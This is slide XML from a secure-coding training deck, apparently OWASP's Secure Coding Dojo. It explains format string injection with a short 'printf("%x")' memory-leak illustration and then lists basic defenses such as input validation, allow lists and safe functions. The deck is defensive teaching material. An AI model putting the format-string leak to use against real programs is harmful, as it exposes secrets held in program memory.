            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841E2566-DEF8-6C4D-8CB2-C5BECB081633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3122503" y="2910778"/>
            <a:ext cx="1328184" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>secret = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>123</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Curved Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60180200-4B58-C44C-857D-C52BCA6E31C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4647328" y="3098597"/>
            <a:ext cx="1086658" cy="12700"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="5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4438A7-C003-B64F-9779-C97132352804}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4555281" y="2726112"/>
            <a:ext cx="1298241" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>printf("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F29A75FA-7A50-A54D-B0B9-579DCD8291F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2" cstate="screen">
            <a:alphaModFix amt="53000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="80810" t="3839" r="2089" b="67679"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639766" y="2492785"/>
            <a:ext cx="1074974" cy="1265127"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E332A7-C84C-3C4E-83AF-5E3B8B8CE83B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5733986" y="2092744"/>
            <a:ext cx="857927" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98759A5F-2D0F-094D-98EA-8D679F299075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5895087" y="2894841"/>
            <a:ext cx="535724" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>123</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7001460A-0825-7E42-BE88-AB919A4F7BF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6970061" y="1673083"/>
            <a:ext cx="4230624" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>Format String Injection allows attackers to leak program memory by passing unexpected format strings to the program.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329712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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preventing Software Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365F41C3-2B7A-A946-9BC3-1EB328FF7109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>The Basic Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367848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9A56-CA63-5E4D-8EC4-3C1541C03819}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584703" y="156895"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>The Tip of the Iceberg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5617D5F-1618-C740-880B-D8957ED3DC86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1570645" y="2443313"/>
            <a:ext cx="3018576" cy="863999"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="59000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:effectLst>
            <a:reflection blurRad="6350" stA="60000" endPos="55000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Input Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F484C59C-A82B-9B43-BAEE-88ED0C7CECD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5144981" y="2901250"/>
            <a:ext cx="3944188" cy="8121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Parameterized Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D247C29F-AA24-5A4E-90D1-0EFC58F2E599}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9530992" y="3473158"/>
            <a:ext cx="2344634" cy="851731"/>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Safe functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C5F6D06-F22C-3A4E-AC84-AF6455D13B96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8202162" y="4746538"/>
            <a:ext cx="3673464" cy="875703"/>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Indirect Object References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B21490-CC20-4C44-A035-EDDD9C61545A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5842504" y="4104447"/>
            <a:ext cx="1993558" cy="841916"/>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Encrypt Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0220C5E8-E4DE-7544-A9A3-966BFB5D3627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1969203" y="3899024"/>
            <a:ext cx="2930723" cy="847514"/>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Safe Memory Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A5EC628-73CE-804D-95E7-3E9DF57154D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2463533" y="5132167"/>
            <a:ext cx="2681448" cy="807025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="59000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:effectLst>
            <a:reflection blurRad="6350" stA="60000" endPos="55000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>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ourier" pitchFamily="2" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Neutralize Output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56491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7C5A-0D2C-A743-8467-4F0B02FCE92A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4D43D8F-DF5A-8842-A7A2-CBFF7F9E7448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10723075" cy="4620442"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="27000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Only allow input that you are expecting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Would you let someone in your house if you thought they should not be there?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="3200" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Block lists are inefficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Would you maintain a block list of people that cannot come to your house?  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Block listing - like giving keys to your house to everyone except a few unwanted visitors.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151406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811198"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VALIDATION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9458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5ED0B-B949-9849-B6F4-1433210C66A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="843480"/>
            <a:ext cx="12192000" cy="5217975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCC50F44-76E6-624D-8FE1-8B98F2E0AC66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1765426"/>
            <a:ext cx="12191999"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F1268D3-9F5A-2F44-A737-AC1672C34781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4733454"/>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83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8552-AFCB-F34E-89FC-A2F2990EAB14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>About Secure Coding Dojo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EB943F5-81B0-FD44-B590-A001E1330BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143073" y="1979925"/>
            <a:ext cx="5809180" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>The Secure Coding Dojo is a platform for delivering and tracking security training for developers. The platform is created for development organizations of all sizes: from university classrooms to large enterprises.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>The open source project is supported by Trend Micro where it was created as a development training tool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>Starting with 2019 the Secure Coding Dojo has become an OWASP project.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33ED612-74FE-054E-9485-8FE5CDBCC47E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2568610" y="2167116"/>
            <a:ext cx="1428750" cy="1261884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A707417F-9629-104E-9818-A59970EFE1E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="screen">
            <a:duotone>
              <a:schemeClr val="accent6">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
            <a:alphaModFix/>
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId3">
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="5107"/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:saturation sat="79000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2181589" y="2798058"/>
            <a:ext cx="426744" cy="522210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9111B9F7-2438-A644-9398-95066BCE67EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632331" y="2009692"/>
            <a:ext cx="2383340" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
